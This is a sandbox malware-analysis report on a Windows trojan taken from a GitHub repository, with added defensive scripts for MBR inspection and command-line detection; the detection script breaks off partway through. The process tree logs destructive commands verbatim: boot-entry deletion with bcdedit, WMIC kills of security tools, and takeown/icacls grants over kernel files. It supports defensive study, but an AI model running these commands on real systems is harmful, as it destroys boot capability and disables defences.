Analysis
max time kernel: 1450s
max time network: 1364s
platform: windows10-1703_x64
resource: win10-20240404-en
resource tags: arch:x64, arch:x86, image:win10-20240404-en, locale:en-us, os:windows10-1703-x64, system
submitted: 30/05/2024, 12:55
Static task: static1
URLScan task: urlscan1
Behavioral task: behavioral1
Sample: https://github.com/pankoza2-pl/trojan-leaks
Resource: win10-20240404-en
General
Target: https://github.com/pankoza2-pl/trojan-leaks
Malware Config
Signatures
Downloads MZ/PE file
Possible privilege escalation attempt (25 IoCs)
  takeown.exe: PIDs 4612, 3600, 1208, 4108, 2352, 2372, 4996, 1976, 872, 372, 3916, 1728, 484
  icacls.exe: PIDs 3116, 2084, 1476, 1316, 696, 4664, 1900, 1256, 4396, 704, 640, 4484
Executes dropped EXE (3 IoCs)
  1664 0x07.exe, 1012 winconfig.exe, 3232 DetectKey.exe
Modifies file permissions (1 TTP, 25 IoCs)
  takeown.exe: PIDs 4108, 1208, 3916, 484, 872, 2352, 4996, 372, 3600, 4612, 1728, 1976, 2372
  icacls.exe: PIDs 704, 640, 696, 4396, 3116, 4664, 1476, 1316, 1256, 2084, 1900, 4484
Legitimate hosting services abused for malware hosting/C2 (1 TTP, 3 IoCs)
  flow 76: raw.githubusercontent.com
  flow 77: raw.githubusercontent.com
  flow 78: raw.githubusercontent.com
Modifies boot configuration data using bcdedit (1 IoC)
  3632 bcdedit.exe
Writes to the Master Boot Record (MBR) (1 TTP, 1 IoC)
Bootkits write to the MBR to gain persistence at a level below the operating system.
  File opened for modification: \??\PhysicalDrive0 (0x07.exe)
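The report only records that 0x07.exe opened \??\PhysicalDrive0 for modification; it does not show what was written, and the same process tree also runs `bcdedit /delete {current}`, so the first sector of the disk is the first thing to check on an affected machine. The script below is an added example, not part of the Triage report or of the sample: it parses a raw 512-byte boot sector, compares the boot-code hash against a baseline taken from a known-good image of the same machine, and applies the heuristics that usually catch an overwritten MBR (empty partition table, no active partition, a boot-code area that is mostly printable text). Both sectors it analyses are constructed inline for the demonstration.

```python
"""Inspect a raw 512-byte boot sector (MBR) and compare it with a known-good
baseline. Added example for the PhysicalDrive0 write flagged above; the sample
sectors are constructed here and are not the sector this sample wrote."""
import hashlib
import struct

SECTOR_SIZE = 512
BOOT_SIGNATURE = b"\x55\xaa"       # bytes 510-511 of a valid MBR
PARTITION_TABLE_OFFSET = 446       # four 16-byte partition entries
BOOT_CODE_LEN = 440                # boot code before the 4-byte disk signature


def parse_mbr(sector: bytes) -> dict:
    """Return signature validity, boot-code hash, disk signature and partitions."""
    if len(sector) != SECTOR_SIZE:
        raise ValueError("expected exactly one 512-byte sector")
    partitions = []
    for i in range(4):
        status, _, _, _, ptype, _, _, _, lba_start, lba_len = struct.unpack_from(
            "<BBBBBBBBII", sector, PARTITION_TABLE_OFFSET + 16 * i)
        if ptype != 0:             # type 0 marks an unused entry
            partitions.append({"index": i, "bootable": status == 0x80, "type": ptype,
                               "lba_start": lba_start, "sectors": lba_len})
    return {
        "valid_signature": sector[510:512] == BOOT_SIGNATURE,
        "boot_code_sha256": hashlib.sha256(sector[:BOOT_CODE_LEN]).hexdigest(),
        "disk_signature": struct.unpack_from("<I", sector, BOOT_CODE_LEN)[0],
        "partitions": partitions,
    }


def check_mbr(sector: bytes, baseline_boot_code_sha256: str) -> list:
    """List the reasons this sector looks tampered with; empty list means clean."""
    info = parse_mbr(sector)
    findings = []
    if not info["valid_signature"]:
        findings.append("boot signature 0x55AA missing")
    if info["boot_code_sha256"] != baseline_boot_code_sha256:
        findings.append("boot code differs from baseline")
    if not info["partitions"]:
        findings.append("partition table empty")
    elif any(p["type"] == 0xEE for p in info["partitions"]):
        findings.append("protective MBR (GPT disk): verify the GPT headers too")
    elif not any(p["bootable"] for p in info["partitions"]):
        findings.append("no active partition")
    # MBR lockers typically replace the boot code with a text message
    printable = sum(32 <= b < 127 for b in sector[:BOOT_CODE_LEN]) / BOOT_CODE_LEN
    if printable > 0.6:
        findings.append("boot code is mostly printable text")
    return findings


def build_sample_mbr() -> bytes:
    """Constructed known-good sector: a short code stub and one active NTFS partition."""
    boot_code = b"\xeb\x63\x90" + b"\x00" * (BOOT_CODE_LEN - 3)
    entry = struct.pack("<BBBBBBBBII", 0x80, 0x20, 0x21, 0x00, 0x07, 0xFE, 0xFF, 0xFF,
                        2048, 204800)
    table = entry + b"\x00" * 48   # three empty entries
    return boot_code + struct.pack("<I", 0x1A2B3C4D) + b"\x00\x00" + table + BOOT_SIGNATURE


def build_tampered_mbr() -> bytes:
    """Constructed sector as an MBR locker might leave it: a message in the code area,
    the partition table zeroed, and the signature kept so firmware still tries to boot it."""
    message = b"Boot code overwritten (constructed sample)".ljust(BOOT_CODE_LEN, b" ")
    return message + b"\x00" * 6 + b"\x00" * 64 + BOOT_SIGNATURE


if __name__ == "__main__":
    baseline = parse_mbr(build_sample_mbr())["boot_code_sha256"]
    print("known-good:", check_mbr(build_sample_mbr(), baseline))
    print("tampered:  ", check_mbr(build_tampered_mbr(), baseline))
```

On a live Windows host the sector comes from `open(r"\\.\PhysicalDrive0", "rb").read(512)` (the Win32 name for the \??\PhysicalDrive0 object the sandbox logged; it needs an administrator token), on a mounted forensic image from the first 512 bytes of the image file. The baseline hash must come from the same machine or a known-good image of the same OS build: boot code differs between disk layouts, so a generic hash would fire on every host.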
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).
Enumerates system info in registry (2 TTPs, 3 IoCs)
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName (chrome.exe)
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer (chrome.exe)
  Key opened: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS (chrome.exe)
Modifies data under HKEY_USERS (2 IoCs)
  Set value (int): \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133615500475115657" (chrome.exe)
  Key created: \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry (chrome.exe)
Suspicious behavior: EnumeratesProcesses (4 IoCs)
  5060 chrome.exe (x2), 2324 chrome.exe (x2)
Suspicious behavior: GetForegroundWindowSpam (1 IoC)
  1664 0x07.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary (2 IoCs)
  5060 chrome.exe (x2)
Suspicious use of AdjustPrivilegeToken (64 IoCs)
  5060 chrome.exe: Token: SeShutdownPrivilege (32) and Token: SeCreatePagefilePrivilege (32), alternating
Suspicious use of FindShellTrayWindow (34 IoCs)
  5060 chrome.exe (x34)
Suspicious use of SendNotifyMessage (24 IoCs)
  5060 chrome.exe (x24)
Suspicious use of SetWindowsHookEx (3 IoCs)
  1664 0x07.exe, 1012 winconfig.exe, 3232 DetectKey.exe
Suspicious use of WriteProcessMemory (64 IoCs)
  5060 chrome.exe wrote to memory of its own child processes 1772 (procid_target 72), 1308 (74), 5028 (75) and 2688 (76); 64 entries in total, almost all of them to 1308 and 2688
Processes (indented by depth in the process tree; each entry gives the image path and PID, then the command line, then the signatures matched on that process)

[1] C:\Program Files\Google\Chrome\Application\chrome.exe (PID 5060)
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://github.com/pankoza2-pl/trojan-leaks
    - Enumerates system info in registry
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
  [2] C:\Program Files\Google\Chrome\Application\chrome.exe (PID 1772)
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xd0,0xd4,0xd8,0xac,0xdc,0x7ffe349d9758,0x7ffe349d9768,0x7ffe349d9778
  [2] C:\Program Files\Google\Chrome\Application\chrome.exe (PID 1308)
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1516 --field-trial-handle=1748,i,15468193555242554608,10733368550189242284,131072 /prefetch:2
  [2] C:\Program Files\Google\Chrome\Application\chrome.exe (PID 5028)
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2004 --field-trial-handle=1748,i,15468193555242554608,10733368550189242284,131072 /prefetch:8
  [2] C:\Program Files\Google\Chrome\Application\chrome.exe (PID 2688)
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2040 --field-trial-handle=1748,i,15468193555242554608,10733368550189242284,131072 /prefetch:8
  [2] C:\Program Files\Google\Chrome\Application\chrome.exe (PID 4528)
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2832 --field-trial-handle=1748,i,15468193555242554608,10733368550189242284,131072 /prefetch:1
  [2] C:\Program Files\Google\Chrome\Application\chrome.exe (PID 3384)
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2840 --field-trial-handle=1748,i,15468193555242554608,10733368550189242284,131072 /prefetch:1
  [2] C:\Program Files\Google\Chrome\Application\chrome.exe (PID 1784)
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5096 --field-trial-handle=1748,i,15468193555242554608,10733368550189242284,131072 /prefetch:8
  [2] C:\Program Files\Google\Chrome\Application\chrome.exe (PID 4628)
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4712 --field-trial-handle=1748,i,15468193555242554608,10733368550189242284,131072 /prefetch:8
  [2] C:\Program Files\Google\Chrome\Application\chrome.exe (PID 2324)
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2976 --field-trial-handle=1748,i,15468193555242554608,10733368550189242284,131072 /prefetch:2
      - Suspicious behavior: EnumeratesProcesses
  [2] C:\Program Files\Google\Chrome\Application\chrome.exe (PID 792)
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1460 --field-trial-handle=1748,i,15468193555242554608,10733368550189242284,131072 /prefetch:8
  [2] C:\Program Files\Google\Chrome\Application\chrome.exe (PID 2228)
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4784 --field-trial-handle=1748,i,15468193555242554608,10733368550189242284,131072 /prefetch:8
  [2] C:\Program Files\Google\Chrome\Application\chrome.exe (PID 368)
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4876 --field-trial-handle=1748,i,15468193555242554608,10733368550189242284,131072 /prefetch:8
  [2] C:\Program Files\Google\Chrome\Application\chrome.exe (PID 4396)
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1664 --field-trial-handle=1748,i,15468193555242554608,10733368550189242284,131072 /prefetch:8
  [2] C:\Program Files\Google\Chrome\Application\chrome.exe (PID 1476)
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5232 --field-trial-handle=1748,i,15468193555242554608,10733368550189242284,131072 /prefetch:8
  [2] C:\Program Files\Google\Chrome\Application\chrome.exe (PID 4624)
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4872 --field-trial-handle=1748,i,15468193555242554608,10733368550189242284,131072 /prefetch:8
  [2] C:\Users\Admin\Downloads\0x07.exe (PID 1664)
      "C:\Users\Admin\Downloads\0x07.exe"
      - Executes dropped EXE
      - Writes to the Master Boot Record (MBR)
      - Suspicious behavior: GetForegroundWindowSpam
      - Suspicious use of SetWindowsHookEx
    [3] C:\Windows\Temp\winconfig.exe (PID 1012)
        "C:\Windows\Temp\winconfig.exe"
        - Executes dropped EXE
        - Suspicious use of SetWindowsHookEx
      [4] C:\Windows\System32\cmd.exe (PID 2100)
          "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2B40.tmp\2B41.tmp\2B42.bat C:\Windows\Temp\winconfig.exe"
        [5] C:\Users\Admin\AppData\Roaming\DetectKey.exe (PID 3232)
            "C:\Users\Admin\AppData\Roaming\DetectKey.exe"
            - Executes dropped EXE
            - Suspicious use of SetWindowsHookEx
        [5] C:\Windows\system32\bcdedit.exe (PID 3632)
            bcdedit /delete {current}
            - Modifies boot configuration data using bcdedit
        [5] C:\Windows\System32\Wbem\WMIC.exe (PID 3156)
            wmic process where name='taskmgr.exe' delete /nointeractive
        [5] C:\Windows\System32\Wbem\WMIC.exe (PID 4352)
            wmic process where name='perfmon.exe' delete /nointeractive
        [5] C:\Windows\System32\Wbem\WMIC.exe (PID 4232)
            wmic process where name='mmc.exe' delete /nointeractive
        [5] C:\Windows\System32\Wbem\WMIC.exe (PID 3064)
            wmic process where name='PartAssist.exe' delete /nointeractive
        [5] C:\Windows\System32\Wbem\WMIC.exe (PID 4832)
            wmic process where name='control.exe' delete /nointeractive
        [5] C:\Windows\System32\Wbem\WMIC.exe (PID 2992)
            wmic process where name='ProcessHacker.exe' delete /nointeractive
        [5] C:\Windows\System32\Wbem\WMIC.exe (PID 2512)
            wmic process where name='Security Task Manager.exe' delete /nointeractive
        [5] C:\Windows\System32\Wbem\WMIC.exe (PID 2212)
            wmic process where name='Security Task Manager Protable.exe' delete /nointeractive
        [5] C:\Windows\System32\Wbem\WMIC.exe (PID 4948)
            wmic process where name='CCleaner.exe' delete /nointeractive
        [5] C:\Windows\System32\Wbem\WMIC.exe (PID 2648)
            wmic process where name='procexp.exe' delete /nointeractive
        [5] C:\Windows\System32\Wbem\WMIC.exe (PID 4180)
            wmic process where name='procexp64.exe' delete /nointeractive
        [5] C:\Windows\System32\Wbem\WMIC.exe (PID 3932)
            wmic process where name='procexp64a.exe' delete /nointeractive
        [5] C:\Windows\System32\Wbem\WMIC.exe (PID 4652)
            wmic process where name='logonui.exe' delete /nointeractive
        [5] C:\Windows\System32\Wbem\WMIC.exe (PID 1804)
            wmic process where name='regedit.exe' delete /nointeractive
        [5] C:\Windows\System32\Wbem\WMIC.exe (PID 1016)
            wmic process where name='iexplore.exe' delete /nointeractive
        [5] C:\Windows\System32\Wbem\WMIC.exe (PID 604)
            wmic process where name='chrome.exe' delete /nointeractive
        [5] C:\Windows\System32\Wbem\WMIC.exe (PID 1568)
            wmic process where name='firefox.exe' delete /nointeractive
        [5] C:\Windows\System32\Wbem\WMIC.exe (PID 2960)
            wmic process where name='opera.exe' delete /nointeractive
        [5] C:\Windows\System32\Wbem\WMIC.exe (PID 1264)
            wmic process where name='edge.exe' delete /nointeractive
        [5] C:\Windows\System32\Wbem\WMIC.exe (PID 1660)
            wmic process where name='msedge.exe' delete /nointeractive
        [5] C:\Windows\System32\Wbem\WMIC.exe (PID 4296)
            wmic process where name='brave.exe' delete /nointeractive
        [5] C:\Windows\System32\Wbem\WMIC.exe (PID 1988)
            wmic process where name='wmplayer.exe' delete /nointeractive
        [5] C:\Windows\System32\Wbem\WMIC.exe (PID 2300)
            wmic process where name='notepad.exe' delete /nointeractive
        [5] C:\Windows\System32\Wbem\WMIC.exe (PID 2076)
            wmic process where name='notepad++.exe' delete /nointeractive
        [5] C:\Windows\System32\Wbem\WMIC.exe (PID 3476)
            wmic process where name='taskmgr.exe' delete /nointeractive
        [5] C:\Windows\System32\Wbem\WMIC.exe (PID 3712)
            wmic process where name='perfmon.exe' delete /nointeractive
        [5] C:\Windows\System32\Wbem\WMIC.exe (PID 3580)
            wmic process where name='logonui.exe' delete /nointeractive
        [5] C:\Windows\System32\Wbem\WMIC.exe (PID 4428)
            wmic process where name='ProcessHacker.exe' delete /nointeractive
        [5] C:\Windows\system32\takeown.exe (PID 872)
            takeown /f "C:\Windows\system32\taskmgr.exe"
            - Possible privilege escalation attempt
            - Modifies file permissions
        [5] C:\Windows\system32\takeown.exe (PID 4612)
            takeown /f "C:\Windows\system32\hal.dll"
            - Possible privilege escalation attempt
            - Modifies file permissions
        [5] C:\Windows\system32\takeown.exe (PID 4108)
            takeown /f "C:\Windows\system32\winload.exe"
            - Possible privilege escalation attempt
            - Modifies file permissions
        [5] C:\Windows\system32\takeown.exe (PID 1208)
            takeown /f "C:\Windows\system32\ntoskrnl.exe"
            - Possible privilege escalation attempt
            - Modifies file permissions
        [5] C:\Windows\system32\takeown.exe (PID 484)
            takeown /f "C:\Windows\system32\perfmon.exe"
            - Possible privilege escalation attempt
            - Modifies file permissions
        [5] C:\Windows\system32\takeown.exe (PID 2352)
            takeown /f "C:\Windows\system32\resmon.exe"
            - Possible privilege escalation attempt
            - Modifies file permissions
        [5] C:\Windows\system32\takeown.exe (PID 1728)
            takeown /f "C:\Windows\system32\logonui.exe
            - Possible privilege escalation attempt
            - Modifies file permissions
        [5] C:\Windows\system32\takeown.exe (PID 1976)
            takeown /f "C:\Windows\system32\taskkill.exe"
            - Possible privilege escalation attempt
            - Modifies file permissions
        [5] C:\Windows\system32\takeown.exe (PID 3916)
            takeown /f "C:\Windows\system32\tasklist.exe"
            - Possible privilege escalation attempt
            - Modifies file permissions
        [5] C:\Windows\system32\takeown.exe (PID 4996)
            takeown /f "C:\Windows\system32\tskill.exe"
            - Possible privilege escalation attempt
            - Modifies file permissions
        [5] C:\Windows\system32\takeown.exe (PID 2372)
            takeown /f "C:\Windows\system32\logonui.exe"
            - Possible privilege escalation attempt
            - Modifies file permissions
        [5] C:\Windows\system32\takeown.exe (PID 372)
            takeown /f "C:\Program Files\Process Hacker 2"
            - Possible privilege escalation attempt
            - Modifies file permissions
        [5] C:\Windows\system32\takeown.exe (PID 3600)
            takeown /f "C:\Windows\System32\drivers"
            - Possible privilege escalation attempt
            - Modifies file permissions
        [5] C:\Windows\System32\Wbem\WMIC.exe (PID 2128)
            wmic process where name='taskmgr.exe' delete /nointeractive
        [5] C:\Windows\System32\Wbem\WMIC.exe (PID 1484)
            wmic process where name='perfmon.exe' delete /nointeractive
        [5] C:\Windows\System32\Wbem\WMIC.exe (PID 2228)
            wmic process where name='logonui.exe' delete /nointeractive
        [5] C:\Windows\System32\Wbem\WMIC.exe (PID 4860)
            wmic process where name='ProcessHacker.exe' delete /nointeractive
        [5] C:\Windows\system32\icacls.exe (PID 3116)
            icacls "C:\Windows\system32\taskmgr.exe" /grant "everyone":F
            - Possible privilege escalation attempt
            - Modifies file permissions
        [5] C:\Windows\system32\icacls.exe (PID 2084)
            icacls "C:\Windows\system32\hal.dll" /grant "everyone":F
            - Possible privilege escalation attempt
            - Modifies file permissions
        [5] C:\Windows\system32\icacls.exe (PID 4664)
            icacls "C:\Windows\system32\winload.exe" /grant "everyone":F
            - Possible privilege escalation attempt
            - Modifies file permissions
        [5] C:\Windows\system32\icacls.exe (PID 1900)
            icacls "C:\Windows\system32\ntoskrnl.exe" /grant "everyone":F
            - Possible privilege escalation attempt
            - Modifies file permissions
        [5] C:\Windows\system32\icacls.exe (PID 704)
            icacls "C:\Windows\system32\perfmon.exe" /grant "everyone":F
            - Possible privilege escalation attempt
            - Modifies file permissions
        [5] C:\Windows\system32\icacls.exe (PID 1256)
            icacls "C:\Windows\system32\logonui.exe" /grant "everyone":F
            - Possible privilege escalation attempt
            - Modifies file permissions
        [5] C:\Windows\system32\icacls.exe (PID 640)
            icacls "C:\Windows\system32\resmon.exe" /grant "everyone":F
            - Possible privilege escalation attempt
            - Modifies file permissions
        [5] C:\Windows\system32\icacls.exe (PID 1476)
            icacls "C:\Windows\system32\taskkill.exe" /grant "everyone":F
            - Possible privilege escalation attempt
            - Modifies file permissions
        [5] C:\Windows\system32\icacls.exe (PID 4396)
            icacls "C:\Windows\system32\tasklist.exe" /grant "everyone":F
            - Possible privilege escalation attempt
            - Modifies file permissions
        [5] C:\Windows\system32\icacls.exe (PID 4484)
            icacls "C:\Windows\system32\tskill.exe" /grant "everyone":F
            - Possible privilege escalation attempt
            - Modifies file permissions
        [5] C:\Windows\system32\icacls.exe (PID 696)
            icacls "C:\Program Files\Process Hacker 2" /q /c /t /grant "everyone":F
            - Possible privilege escalation attempt
            - Modifies file permissions
        [5] C:\Windows\system32\icacls.exe (PID 1316)
            icacls "C:\Windows\System32\drivers" /q /c /t /grant "everyone":F
            - Possible privilege escalation attempt
            - Modifies file permissions
        [5] C:\Windows\System32\Wbem\WMIC.exe (PID 2976)
            wmic process where name='taskmgr.exe' delete /nointeractive
        [5] C:\Windows\System32\Wbem\WMIC.exe (PID 3908)
            wmic process where name='perfmon.exe' delete /nointeractive
        [5] C:\Windows\System32\Wbem\WMIC.exe (PID 2364)
            wmic process where name='logonui.exe' delete /nointeractive
        [5] C:\Windows\System32\Wbem\WMIC.exe (PID 1020)
            wmic process where name='ProcessHacker.exe' delete /nointeractive
        [5] C:\Windows\system32\cmd.exe (PID 984)
            C:\Windows\system32\cmd.exe /S /D /c" echo y"
        [5] C:\Windows\system32\cacls.exe (PID 3892)
            cacls "C:\Windows\system32\taskmgr.exe" /grant "everyone":F
        [5] C:\Windows\system32\cmd.exe (PID 2752)
            C:\Windows\system32\cmd.exe /S /D /c" echo y"
        [5] C:\Windows\system32\cacls.exe (PID 3212)
            cacls "C:\Windows\system32\hal.dll" /grant "everyone":F
        [5] C:\Windows\system32\cmd.exe (PID 1764)
            C:\Windows\system32\cmd.exe /S /D /c" echo y"
        [5] C:\Windows\system32\cacls.exe (PID 4364)
            cacls "C:\Windows\system32\ntoskrnl.exe" /grant "everyone":F
        [5] C:\Windows\system32\cmd.exe (PID 2776)
            C:\Windows\system32\cmd.exe /S /D /c" echo y"
        [5] C:\Windows\system32\cacls.exe (PID 4628)
            cacls "C:\Windows\system32\perfmon.exe" /grant "everyone":F
        [5] C:\Windows\system32\cmd.exe (PID 4832)
            C:\Windows\system32\cmd.exe /S /D /c" echo y"
        [5] C:\Windows\system32\cacls.exe (PID 1800)
            cacls "C:\Windows\system32\logonui.exe" /grant "everyone":F
        [5] C:\Windows\system32\cmd.exe (PID 3032)
            C:\Windows\system32\cmd.exe /S /D /c" echo y"
        [5] C:\Windows\system32\cacls.exe (PID 1560)
            cacls "C:\Windows\system32\resmon.exe" /grant "everyone":F
        [5] C:\Windows\system32\cmd.exe (PID 4420)
            C:\Windows\system32\cmd.exe /S /D /c" echo y"
        [5] C:\Windows\system32\cacls.exe (PID 2176)
            cacls "C:\Windows\system32\taskkill.exe" /grant "everyone":F
        [5] C:\Windows\system32\cmd.exe (PID 4400)
            C:\Windows\system32\cmd.exe /S /D /c" echo y"
        [5] C:\Windows\system32\cacls.exe (PID 1300)
            cacls "C:\Windows\system32\tasklist.exe" /grant "everyone":F
        [5] C:\Windows\system32\cmd.exe (PID 3608)
            C:\Windows\system32\cmd.exe /S /D /c" echo y"
        [5] C:\Windows\system32\cacls.exe (PID 2272)
            cacls "C:\Windows\system32\tskill.exe" /grant "everyone":F
        [5] C:\Windows\system32\cmd.exe (PID 4092)
            C:\Windows\system32\cmd.exe /S /D /c" echo y"
        [5] C:\Windows\system32\cacls.exe (PID 3460)
            cacls "C:\Program Files\Process Hacker 2" /grant "everyone":F
        [5] C:\Windows\system32\cmd.exe (PID 4300)
            C:\Windows\system32\cmd.exe /S /D /c" echo y"
        [5] C:\Windows\system32\cacls.exe (PID 2224)
            cacls "C:\Windows\System32\drivers" /grant "everyone":F
[1] C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe (PID 3192)
    "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
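Reading the tree as an analyst rather than as a signature list: chrome.exe (PID 5060) fetches the sample from the GitHub page and launches the downloaded 0x07.exe (PID 1664), which opens \??\PhysicalDrive0 for modification and drops C:\Windows\Temp\winconfig.exe (PID 1012). winconfig.exe starts a batch file through "C:\Windows\sysnative\cmd.exe" (PID 2100); the sysnative alias only resolves from a 32-bit process, which matches the arch:x86 tag and explains why the recorded image is the 64-bit C:\Windows\System32\cmd.exe. Everything at depth 5 is a child of that cmd.exe: DetectKey.exe, `bcdedit /delete {current}` (removes the active boot entry, so the machine does not boot again without BCD repair), dozens of `wmic process where name='...' delete` calls aimed at task managers, Process Explorer/Process Hacker, regedit, mmc, the browsers and text editors, and three rounds of takeown, icacls and `echo y | cacls` that grant Everyone full control over ntoskrnl.exe, hal.dll, winload.exe, the System32\drivers tree and the monitoring tools (the paired `cmd /S /D /c" echo y"` entries are the left-hand side of the pipe, auto-answering cacls's confirmation prompt). Triage labels the takeown/icacls activity "Possible privilege escalation attempt", but these commands only succeed from an already elevated token; combined with the MBR write and the bcdedit call they are defence impairment and destruction, not escalation. The chrome.exe signatures (AdjustPrivilegeToken, FindShellTrayWindow, SendNotifyMessage, WriteProcessMemory into its own child processes) are normal browser behaviour and carry no signal here.

The script below is an added example, not Triage output and not part of the sample: it classifies process-creation events (Sysmon Event ID 1 or Security 4688 exported as JSON; the field names `pid`, `ppid`, `image`, `cmd` are an assumption of this example) with the rules a detection engineer would derive from this tree, then correlates the hits per parent process so that a single admin running icacls on a share does not page anyone while the cluster of behaviours under one cmd.exe does. The sample events are constructed from the command lines above plus one benign control.

```python
"""Flag the destructive / defence-impairment command pattern from this report in
process-creation telemetry. Added example; event field names and the sample
events are constructed for the demonstration, not Triage output."""
import re
from collections import defaultdict

# Constructed sample events modelled on the command lines in the tree above.
# Every depth-5 command is a child of cmd.exe PID 2100, the parent we correlate on.
# The last event is benign administration on a user folder and must not alert.
SAMPLE_EVENTS = [
    {"pid": 3632, "ppid": 2100, "image": r"C:\Windows\system32\bcdedit.exe",
     "cmd": "bcdedit /delete {current}"},
    {"pid": 2992, "ppid": 2100, "image": r"C:\Windows\System32\Wbem\WMIC.exe",
     "cmd": "wmic process where name='ProcessHacker.exe' delete /nointeractive"},
    {"pid": 604, "ppid": 2100, "image": r"C:\Windows\System32\Wbem\WMIC.exe",
     "cmd": "wmic process where name='chrome.exe' delete /nointeractive"},
    {"pid": 1208, "ppid": 2100, "image": r"C:\Windows\system32\takeown.exe",
     "cmd": r'takeown /f "C:\Windows\system32\ntoskrnl.exe"'},
    {"pid": 1900, "ppid": 2100, "image": r"C:\Windows\system32\icacls.exe",
     "cmd": r'icacls "C:\Windows\system32\ntoskrnl.exe" /grant "everyone":F'},
    {"pid": 1316, "ppid": 2100, "image": r"C:\Windows\system32\icacls.exe",
     "cmd": r'icacls "C:\Windows\System32\drivers" /q /c /t /grant "everyone":F'},
    {"pid": 4364, "ppid": 2100, "image": r"C:\Windows\system32\cacls.exe",
     "cmd": r'cacls "C:\Windows\system32\ntoskrnl.exe" /grant "everyone":F'},
    {"pid": 7001, "ppid": 9000, "image": r"C:\Windows\system32\icacls.exe",
     "cmd": r'icacls "C:\Users\Admin\share" /grant "Admin":(OI)(CI)M'},
]

TAKEOWN_RE = re.compile(r'^takeown\b.*?/f\s+"?(?P<path>[^"]+)"?', re.I)
# icacls/cacls <path> ... /grant [":r"] Everyone|S-1-1-0 : [(OI)(CI)...]F
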